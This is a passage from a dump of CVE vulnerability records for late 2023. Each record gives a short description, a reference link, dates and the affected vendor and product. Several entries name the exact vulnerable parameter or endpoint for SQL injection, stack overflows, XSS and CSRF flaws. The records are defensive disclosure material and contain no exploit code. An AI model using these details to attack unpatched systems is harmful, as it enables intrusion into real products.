2024-01-12T20:37:26.516Z
2024-01-12T20:37:26.516Z
{'Vendor': 'discourse', 'Product': 'discourse-reactions', 'Versions': '< commit 2c26939'}
CVE-2023-49132
A vulnerability has been identified in Solid Edge SE2023 (All versions < V223.0 Update 10). The affected application is vulnerable to uninitialized pointer access while parsing specially crafted PAR files. An attacker could leverage this vulnerability to execute code in the context of the current process.
https://cert-portal.siemens.com/productcert/pdf/ssa-589891.pdf
2023-11-22T14:53:05.160Z
2024-01-09T10:00:07.440Z
2024-01-09T10:00:07.440Z
{'Vendor': 'Siemens', 'Product': 'Solid Edge SE2023', 'Versions': 'All versions < V223.0 Update 10'}
CVE-2023-49775
Cross-Site Request Forgery (CSRF) vulnerability in Denis Kobozev CSV Importer.This issue affects CSV Importer: from n/a through 0.3.8.
https://patchstack.com/database/vulnerability/csv-importer/wordpress-csv-importer-plugin-0-3-8-cross-site-request-forgery-csrf-vulnerability?_s_id=cve
2023-11-30T13:22:54.826Z
2023-12-17T10:05:27.717Z
2023-12-17T10:05:27.717Z
{'Vendor': 'Denis Kobozev', 'Product': 'CSV Importer', 'Versions': 'n/a'}
CVE-2023-49260
An XSS attack can be performed by changing the MOTD banner and pointing the victim to the "terminal_tool.cgi" path. It can be used together with the vulnerability CVE-2023-49255.
https://cert.pl/en/posts/2024/01/CVE-2023-49253/
2023-11-24T11:53:46.294Z
2024-01-12T14:25:17.934Z
2024-01-12T14:25:17.934Z
{'Vendor': 'Hongdian', 'Product': 'H8951-4G-ESP', 'Versions': '0'}
CVE-2023-49149
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in CurrencyRate.Today Currency Converter Calculator allows Stored XSS.This issue affects Currency Converter Calculator: from n/a through 1.3.1.
https://patchstack.com/database/vulnerability/currency-converter-calculator/wordpress-currency-converter-calculator-plugin-1-3-1-cross-site-scripting-xss-vulnerability?_s_id=cve
2023-11-22T23:35:38.289Z
2023-12-14T17:01:13.100Z
2023-12-14T17:01:13.100Z
{'Vendor': 'CurrencyRate.today', 'Product': 'Currency Converter Calculator', 'Versions': 'n/a'}
CVE-2023-49722
Network port 8899 open in WiFi firmware of BCC101/BCC102/BCC50 products, that allows an attacker to connect to the device via same WiFi network.
https://psirt.bosch.com/security-advisories/BOSCH-SA-473852.html
2023-11-30T08:50:43.845Z
2024-01-09T09:54:57.409Z
2024-01-09T09:54:57.409Z
{'Vendor': 'Bosch', 'Product': 'BCC101', 'Versions': '4.13.20'}
CVE-2023-49372
JFinalCMS v5.0.0 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via /admin/slide/save.
https://github.com/li-yu320/cms/blob/main/There%20is%20a%20CSRF%20present%20at%20the%20new%20location%20of%20the%20rotation%20image.md
2023-11-27T00:00:00
2023-12-05T00:00:00
2023-12-05T14:26:40.286660
{'Vendor': 'n/a', 'Product': 'n/a', 'Versions': 'n/a'}
CVE-2023-49688
Job Portal v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'txtUser' parameter of the login.php resource does not validate the characters received and they are sent unfiltered to the database.
https://fluidattacks.com/advisories/pollini/
2023-11-29T17:48:17.255Z
2023-12-21T23:21:04.511Z
2023-12-21T23:21:04.511Z
{'Vendor': 'Kashipara Group', 'Product': 'Job Portal', 'Versions': '1.0'}
CVE-2023-49237
An issue was discovered on TRENDnet TV-IP1314PI 5.5.3 200714 devices. Command injection can occur because the system function is used by davinci to unpack language packs without strict filtering of URL strings.
https://drive.google.com/file/d/1lTloBkH_7zAz1ZbFVSZnfpoPd81aPaHx/view?usp=sharing
2023-11-24T00:00:00
2024-01-09T00:00:00
2024-01-09T08:48:21.677572
{'Vendor': 'n/a', 'Product': 'n/a', 'Versions': 'n/a'}
CVE-2023-49958
An issue was discovered in Dalmann OCPP.Core through 1.2.0 for OCPP (Open Charge Point Protocol) for electric vehicles. The server processes mishandle StartTransaction messages containing additional, arbitrary properties, or duplicate properties. The last occurrence of a duplicate property is accepted. This could be exploited to alter transaction records or impact system integrity.
https://github.com/dallmann-consulting/OCPP.Core/issues/36
2023-12-03T00:00:00
2023-12-07T00:00:00
2023-12-07T13:01:54.529118
{'Vendor': 'n/a', 'Product': 'n/a', 'Versions': 'n/a'}
CVE-2023-49734
An authenticated Gamma user has the ability to create a dashboard and add charts to it, this user would automatically become one of the owners of the charts allowing him to incorrectly have write permissions to these charts.This issue affects Apache Superset: before 2.1.2, from 3.0.0 before 3.0.2. Users are recommended to upgrade to version 3.0.2 or 2.1.3, which fixes the issue.
https://lists.apache.org/thread/985h6ltvtbvdoysso780kkj7x744cds5
2023-11-30T12:29:59.894Z
2023-12-19T09:52:13.373Z
2023-12-19T09:52:13.373Z
{'Vendor': 'Apache Software Foundation', 'Product': 'Apache Superset', 'Versions': '0, 3.0.0'}
CVE-2023-49558
An issue in YASM 1.3.0.86.g9def allows a remote attacker to cause a denial of service via the expand_mmac_params function in the modules/preprocs/nasm/nasm-pp.c component.
https://github.com/yasm/yasm/issues/252
2023-11-27T00:00:00
2024-01-02T00:00:00
2024-01-02T23:41:06.436238
{'Vendor': 'n/a', 'Product': 'n/a', 'Versions': 'n/a'}
CVE-2023-49108
Path traversal vulnerability exists in RakRak Document Plus Ver.3.2.0.0 to Ver.6.4.0.7 (excluding Ver.6.1.1.3a). If this vulnerability is exploited, arbitrary files on the server may be obtained or deleted by a user of the product with specific privileges.
https://rakrak.jp/RakDocSupport/rkspServlet
2023-11-22T04:24:31.707Z
2023-12-04T05:08:29.398Z
2023-12-04T05:08:29.398Z
{'Vendor': 'Sumitomo Electric Information Systems Co., Ltd.', 'Product': 'RakRak Document Plus', 'Versions': 'Ver.3.2.0.0 to Ver.6.4.0.7 (excluding Ver.6.1.1.3a)'}
CVE-2023-49763
Cross-Site Request Forgery (CSRF) vulnerability in Creatomatic Ltd CSprite.This issue affects CSprite: from n/a through 1.1.
https://patchstack.com/database/vulnerability/csprite/wordpress-csprite-plugin-1-1-cross-site-request-forgery-csrf-vulnerability?_s_id=cve
2023-11-30T13:22:27.402Z
2023-12-18T22:28:27.713Z
2023-12-18T22:28:27.713Z
{'Vendor': 'Creatomatic Ltd', 'Product': 'CSprite', 'Versions': 'n/a'}
CVE-2023-49299
Improper Input Validation vulnerability in Apache DolphinScheduler. An authenticated user can cause arbitrary, unsandboxed javascript to be executed on the server.This issue affects Apache DolphinScheduler: until 3.1.9. Users are recommended to upgrade to version 3.1.9, which fixes the issue.
https://github.com/apache/dolphinscheduler/pull/15228
2023-11-26T10:03:26.679Z
2023-12-30T16:27:12.045Z
2023-12-30T16:30:17.905Z
{'Vendor': 'Apache Software Foundation', 'Product': 'Apache DolphinScheduler', 'Versions': '0'}
CVE-2023-49276
Uptime Kuma is an open source self-hosted monitoring tool. In affected versions the Google Analytics element in vulnerable to Attribute Injection leading to Cross-Site-Scripting (XSS). Since the custom status interface can set an independent Google Analytics ID and the template has not been sanitized, there is an attribute injection vulnerability here, which can lead to XSS attacks. This vulnerability has been addressed in commit `f28dccf4e` which is included in release version 1.23.7. Users are advised to upgrade. There are no known workarounds for this vulnerability.
https://github.com/louislam/uptime-kuma/security/advisories/GHSA-v4v2-8h88-65qj
2023-11-24T16:45:24.311Z
2023-12-01T22:05:41.789Z
2023-12-01T22:05:41.789Z
{'Vendor': 'louislam', 'Product': 'uptime-kuma', 'Versions': '>= 1.20.0, < 1.23.7'}
CVE-2023-49762
Exposure of Sensitive Information to an Unauthorized Actor vulnerability in AppMySite AppMySite – Create an app with the Best Mobile App Builder.This issue affects AppMySite – Create an app with the Best Mobile App Builder: from n/a through 3.11.0.
https://patchstack.com/database/vulnerability/appmysite/wordpress-appmysite-create-an-app-with-the-best-mobile-app-builder-plugin-3-10-0-sensitive-data-exposure-vulnerability?_s_id=cve
2023-11-30T13:22:27.402Z
2023-12-21T13:09:02.488Z
2023-12-21T13:09:02.488Z
{'Vendor': 'AppMySite', 'Product': 'AppMySite – Create an app with the Best Mobile App Builder', 'Versions': 'n/a'}
CVE-2023-49298
OpenZFS through 2.1.13 and 2.2.x through 2.2.1, in certain scenarios involving applications that try to rely on efficient copying of file data, can replace file contents with zero-valued bytes and thus potentially disable security mechanisms. NOTE: this issue is not always security related, but can be security related in realistic situations. A possible example is cp, from a recent GNU Core Utilities (coreutils) version, when attempting to preserve a rule set for denying unauthorized access. (One might use cp when configuring access control, such as with the /etc/hosts.deny file specified in the IBM Support reference.) NOTE: this issue occurs less often in version 2.2.1, and in versions before 2.1.4, because of the default configuration in those versions.
https://github.com/openzfs/zfs/pull/15571
2023-11-24T00:00:00
2023-11-24T00:00:00
2023-12-26T14:18:08.307339
{'Vendor': 'n/a', 'Product': 'n/a', 'Versions': 'n/a'}
CVE-2023-49277
dpaste is an open source pastebin application written in Python using the Django framework. A security vulnerability has been identified in the expires parameter of the dpaste API, allowing for a POST Reflected XSS attack. This vulnerability can be exploited by an attacker to execute arbitrary JavaScript code in the context of a user's browser, potentially leading to unauthorized access, data theft, or other malicious activities. Users are strongly advised to upgrade to dpaste release v3.8 or later versions, as dpaste versions older than v3.8 are susceptible to the identified security vulnerability. No known workarounds have been identified, and applying the patch is the most effective way to remediate the vulnerability.
https://github.com/DarrenOfficial/dpaste/security/advisories/GHSA-r8j9-5cj7-cv39
2023-11-24T16:45:24.311Z
2023-12-01T20:48:06.371Z
2023-12-01T20:48:06.371Z
{'Vendor': 'DarrenOfficial', 'Product': 'dpaste', 'Versions': '< 3.8'}
CVE-2023-49735
** UNSUPPORTED WHEN ASSIGNED ** The value set as the DefaultLocaleResolver.LOCALE_KEY attribute on the session was not validated while resolving XML definition files, leading to possible path traversal and eventually SSRF/XXE when passing user-controlled data to this key. Passing user-controlled data to this key may be relatively common, as it was also used like that to set the language in the 'tiles-test' application shipped with Tiles. This issue affects Apache Tiles from version 2 onwards. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.
https://lists.apache.org/thread/8ktm4vxr6vvc1qsxh6ft8jzmom1zl65p
2023-11-30T13:12:38.604Z
2023-11-30T21:17:28.243Z
2023-12-12T08:40:27.319Z
{'Vendor': 'Apache Software Foundation', 'Product': 'Apache Tiles', 'Versions': '2.0.0'}
CVE-2023-49373
JFinalCMS v5.0.0 was discovered to contain a Cross-Site Request Forgery (CSRF) via /admin/slide/delete.
https://github.com/li-yu320/cms/blob/main/There%20is%20a%20CSRF%20at%20the%20deletion%20point%20of%20the%20broadcast%20image.md
2023-11-27T00:00:00
2023-12-05T00:00:00
2023-12-05T14:26:01.720218
{'Vendor': 'n/a', 'Product': 'n/a', 'Versions': 'n/a'}
CVE-2023-49689
Job Portal v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'JobId' parameter of the Employer/DeleteJob.php resource does not validate the characters received and they are sent unfiltered to the database.
https://fluidattacks.com/advisories/pollini/
2023-11-29T17:48:17.255Z
2023-12-21T23:26:34.521Z
2023-12-21T23:26:34.521Z
{'Vendor': 'Kashipara Group', 'Product': 'Job Portal', 'Versions': '1.0'}
CVE-2023-49666
Billing Software v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'custmer_details' parameter of the submit_material_list.php resource does not validate the characters received and they are sent unfiltered to the database.
https://fluidattacks.com/advisories/zimerman/
2023-11-28T21:52:11.044Z
2024-01-04T14:02:16.288Z
2024-01-04T14:02:16.288Z
{'Vendor': 'Kashipara Group', 'Product': 'Billing Software', 'Versions': '1.0'}
CVE-2023-49236
A stack-based buffer overflow was discovered on TRENDnet TV-IP1314PI 5.5.3 200714 devices, leading to arbitrary command execution. This occurs because of lack of length validation during an sscanf of a user-entered scale field in the RTSP playback function of davinci.
https://drive.google.com/file/d/1lTloBkH_7zAz1ZbFVSZnfpoPd81aPaHx/view?usp=sharing
2023-11-24T00:00:00
2024-01-09T00:00:00
2024-01-09T08:48:19.993850
{'Vendor': 'n/a', 'Product': 'n/a', 'Versions': 'n/a'}
CVE-2023-49148
Cross-Site Request Forgery (CSRF) vulnerability in Kulwant Nagi Affiliate Booster – Pros & Cons, Notice, and CTA Blocks for Affiliates.This issue affects Affiliate Booster – Pros & Cons, Notice, and CTA Blocks for Affiliates: from n/a through 3.0.5.
https://patchstack.com/database/vulnerability/affiliatebooster-blocks/wordpress-affiliate-booster-plugin-3-0-4-cross-site-request-forgery-csrf-vulnerability?_s_id=cve
2023-11-22T23:35:38.289Z
2023-12-18T22:08:11.992Z
2023-12-18T22:08:11.992Z
{'Vendor': 'Kulwant Nagi', 'Product': 'Affiliate Booster – Pros & Cons, Notice, and CTA Blocks for Affiliates', 'Versions': 'n/a'}
CVE-2023-49261
The "tokenKey" value used in user authorization is visible in the HTML source of the login page.
https://cert.pl/en/posts/2024/01/CVE-2023-49253/
2023-11-24T11:53:46.295Z
2024-01-12T14:25:26.606Z
2024-01-12T14:25:26.606Z
{'Vendor': 'Hongdian', 'Product': 'H8951-4G-ESP', 'Versions': '0'}
CVE-2023-49426
Tenda AX12 V22.03.01.46 was discovered to contain a stack overflow via the list parameter at /goform/SetStaticRouteCfg.
https://github.com/ef4tless/vuln/blob/master/iot/AX12/SetStaticRouteCfg.md
2023-11-27T00:00:00
2023-12-07T00:00:00
2023-12-07T14:51:30.071334
{'Vendor': 'n/a', 'Product': 'n/a', 'Versions': 'n/a'}
CVE-2023-49076
Customer-data-framework allows management of customer data within Pimcore. There are no tokens or headers to prevent CSRF attacks from occurring, therefore an attacker could abuse this vulnerability to create new customers. This issue has been patched in version 4.0.5.
https://github.com/pimcore/customer-data-framework/security/advisories/GHSA-xx63-4jr8-9ghc
2023-11-21T18:57:30.427Z
2023-11-30T05:42:12.668Z
2023-11-30T05:42:12.668Z
{'Vendor': 'pimcore', 'Product': 'customer-data-framework', 'Versions': '< 4.0.5'}
CVE-2023-49563
Cross Site Scripting (XSS) in Voltronic Power SNMP Web Pro v.1.1 allows an attacker to execute arbitrary code via a crafted script within a request to the webserver.
https://gist.github.com/ph4nt0mbyt3/b237bfb06b2bff405ab47e4ea52c0bd2
2023-11-27T00:00:00
2023-12-12T00:00:00
2023-12-12T08:17:00.543958
{'Vendor': 'n/a', 'Product': 'n/a', 'Versions': 'n/a'}
CVE-2023-49099
Discourse is a platform for community discussion. Under very specific circumstances, secure upload URLs associated with posts can be accessed by guest users even when login is required. This vulnerability has been patched in 3.2.0.beta4 and 3.1.4.
https://github.com/discourse/discourse/security/advisories/GHSA-j67x-x6mq-pwv4
2023-11-21T18:57:30.430Z
2024-01-12T20:53:53.163Z
2024-01-12T20:53:53.163Z
{'Vendor': 'discourse', 'Product': 'discourse', 'Versions': '< 3.1.4, >= 3.2.0beta1, < 3.2.0.beta4'}
CVE-2023-49830
Improper Control of Generation of Code ('Code Injection') vulnerability in Brainstorm Force Astra Pro.This issue affects Astra Pro: from n/a through 4.3.1.
https://patchstack.com/database/vulnerability/astra-addon/wordpress-astra-pro-plugin-4-3-1-contributor-remote-code-execution-rce-vulnerability?_s_id=cve
2023-11-30T15:27:45.875Z
2023-12-29T09:13:42.503Z
2023-12-29T09:13:42.503Z
{'Vendor': 'Brainstorm Force', 'Product': 'Astra Pro', 'Versions': 'n/a'}
CVE-2023-49471
Blind Server-Side Request Forgery (SSRF) vulnerability in karlomikus Bar Assistant before version 3.2.0 does not validate a parameter before making a request through Image::make(), which could allow authenticated remote attackers to execute arbitrary code.
https://github.com/zunak/CVE-2023-49471
2023-11-27T00:00:00
2024-01-10T00:00:00
2024-01-10T08:57:20.302089
{'Vendor': 'n/a', 'Product': 'n/a', 'Versions': 'n/a'}
CVE-2023-49922
An issue was discovered by Elastic whereby Beats and Elastic Agent would log a raw event in its own logs at the WARN or ERROR level if ingesting that event to Elasticsearch failed with any 4xx HTTP status code except 409 or 429. Depending on the nature of the event that Beats or Elastic Agent attempted to ingest, this could lead to the insertion of sensitive or private information in the Beats or Elastic Agent logs. Elastic has released 8.11.3 and 7.17.16 that prevents this issue by limiting these types of logs to DEBUG level logging, which is disabled by default.
https://discuss.elastic.co/t/beats-and-elastic-agent-8-11-3-7-17-16-security-update-esa-2023-30/349180
2023-12-02T16:06:57.310Z
2023-12-12T18:23:20.438Z
2023-12-12T18:23:32.489Z
{'Vendor': 'Elastic', 'Product': 'Beats', 'Versions': '7.0.0, 8.0.0'}
CVE-2023-49164
Cross-Site Request Forgery (CSRF) vulnerability in OceanWP Ocean Extra.This issue affects Ocean Extra: from n/a through 2.2.2.
https://patchstack.com/database/vulnerability/ocean-extra/wordpress-ocean-extra-plugin-2-2-2-csrf-leading-to-arbitrary-plugin-activation-vulnerability?_s_id=cve
2023-11-22T23:36:04.378Z
2023-12-19T21:41:51.146Z
2023-12-19T21:41:51.146Z
{'Vendor': 'OceanWP', 'Product': 'Ocean Extra', 'Versions': 'n/a'}
CVE-2023-49934
An issue was discovered in SchedMD Slurm 23.11.x. There is SQL Injection against the SlurmDBD database. The fixed version is 23.11.1.
https://www.schedmd.com/security-archive.php
2023-12-03T00:00:00
2023-12-14T00:00:00
2024-01-03T03:06:29.065825
{'Vendor': 'n/a', 'Product': 'n/a', 'Versions': 'n/a'}
CVE-2023-49467
Libde265 v1.0.14 was discovered to contain a heap-buffer-overflow vulnerability in the derive_combined_bipredictive_merging_candidates function at motion.cc.
https://github.com/strukturag/libde265/issues/434
2023-11-27T00:00:00
2023-12-07T00:00:00
2023-12-30T21:06:26.858480
{'Vendor': 'n/a', 'Product': 'n/a', 'Versions': 'n/a'}
CVE-2023-49172
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in BrainCert BrainCert – HTML5 Virtual Classroom allows Reflected XSS.This issue affects BrainCert – HTML5 Virtual Classroom: from n/a through 1.30.
https://patchstack.com/database/vulnerability/html5-virtual-classroom/wordpress-braincert-html5-virtual-classroom-plugin-1-30-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve
2023-11-22T23:36:21.489Z
2023-12-14T15:31:03.476Z
2023-12-14T15:31:03.476Z
{'Vendor': 'BrainCert', 'Product': 'BrainCert – HTML5 Virtual Classroom', 'Versions': 'n/a'}
CVE-2023-49488
A cross-site scripting (XSS) vulnerability in Openfiler ESA v2.99.1 allows attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into the nic parameter.
https://github.com/Hebing123/cve/issues/1
2023-11-27T00:00:00
2023-12-11T00:00:00
2023-12-11T21:07:57.574479
{'Vendor': 'n/a', 'Product': 'n/a', 'Versions': 'n/a'}
CVE-2023-49060
An attacker could have accessed internal pages or data by ex-filtrating a security key from ReaderMode via the `referrerpolicy` attribute. This vulnerability affects Firefox for iOS < 120.
https://bugzilla.mozilla.org/show_bug.cgi?id=1861405
2023-11-20T15:00:28.168Z
2023-11-21T14:28:55.428Z
2023-11-21T14:28:55.428Z
{'Vendor': 'Mozilla', 'Product': 'Firefox for iOS', 'Versions': 'unspecified'}
CVE-2023-49430
Tenda AX9 V22.03.01.46 has been found to contain a stack overflow vulnerability in the 'list' parameter at /goform/SetStaticRouteCfg.
https://github.com/ef4tless/vuln/blob/master/iot/AX9/SetStaticRouteCfg.md
2023-11-27T00:00:00
2023-12-07T00:00:00
2023-12-07T15:33:48.262946
{'Vendor': 'n/a', 'Product': 'n/a', 'Versions': 'n/a'}
CVE-2023-49826
Deserialization of Untrusted Data vulnerability in PenciDesign Soledad – Multipurpose, Newspaper, Blog & WooCommerce WordPress Theme.This issue affects Soledad – Multipurpose, Newspaper, Blog & WooCommerce WordPress Theme: from n/a through 8.4.1.
https://patchstack.com/database/vulnerability/soledad/wordpress-soledad-theme-8-4-1-unauthenticated-php-object-injection-vulnerability?_s_id=cve
2023-11-30T15:27:45.874Z
2023-12-21T12:34:51.957Z
2023-12-21T12:34:51.957Z
{'Vendor': 'PenciDesign', 'Product': 'Soledad – Multipurpose, Newspaper, Blog & WooCommerce WordPress Theme', 'Versions': 'n/a'}
CVE-2023-49294
Asterisk is an open source private branch exchange and telephony toolkit. In Asterisk prior to versions 18.20.1, 20.5.1, and 21.0.1, as well as certified-asterisk prior to 18.9-cert6, it is possible to read any arbitrary file even when the `live_dangerously` is not enabled. This allows arbitrary files to be read. Asterisk versions 18.20.1, 20.5.1, and 21.0.1, as well as certified-asterisk prior to 18.9-cert6, contain a fix for this issue.
https://github.com/asterisk/asterisk/security/advisories/GHSA-8857-hfmw-vg8f
2023-11-24T16:45:24.314Z
2023-12-14T19:40:46.157Z
2023-12-14T19:40:46.157Z
{'Vendor': 'asterisk', 'Product': 'asterisk', 'Versions': '< 18.20.1, >= 19.0.0, < 20.5.1, = 21.0.0, < 18.9-cert6'}
CVE-2023-49152
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Labs64 Credit Tracker allows Stored XSS.This issue affects Credit Tracker: from n/a through 1.1.17.
https://patchstack.com/database/vulnerability/credit-tracker/wordpress-credit-tracker-plugin-1-1-17-cross-site-scripting-xss-vulnerability?_s_id=cve
2023-11-22T23:35:38.290Z
2023-12-14T17:13:34.175Z
2023-12-14T17:13:34.175Z
{'Vendor': 'Labs64', 'Product': 'Credit Tracker', 'Versions': 'n/a'}
CVE-2023-49914
InteraXon Muse 2 devices allow remote attackers to cause a denial of service (incorrect Muse App report of an outstanding, calm meditation state) via a 480 MHz RF carrier that is modulated by a "false" brain wave, aka a Brain-Hack attack. For example, the Muse App does not display the reception of a strong RF carrier, and alert the user that a report may be misleading if this carrier has been modulated by a low-frequency signal.
https://dl.acm.org/doi/10.1145/3605758.3623497
2023-12-02T00:00:00
2023-12-02T00:00:00
2023-12-02T00:19:13.494365
{'Vendor': 'n/a', 'Product': 'n/a', 'Versions': 'n/a'}
CVE-2023-49447
JFinalCMS v5.0.0 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via /admin/nav/update.
https://github.com/ysuzhangbin/cms/blob/main/CSRF%20exists%20at%20the%20navigation%20management%20modification%20location.md
2023-11-27T00:00:00
2023-12-05T00:00:00
2023-12-05T15:00:01.699003
{'Vendor': 'n/a', 'Product': 'n/a', 'Versions': 'n/a'}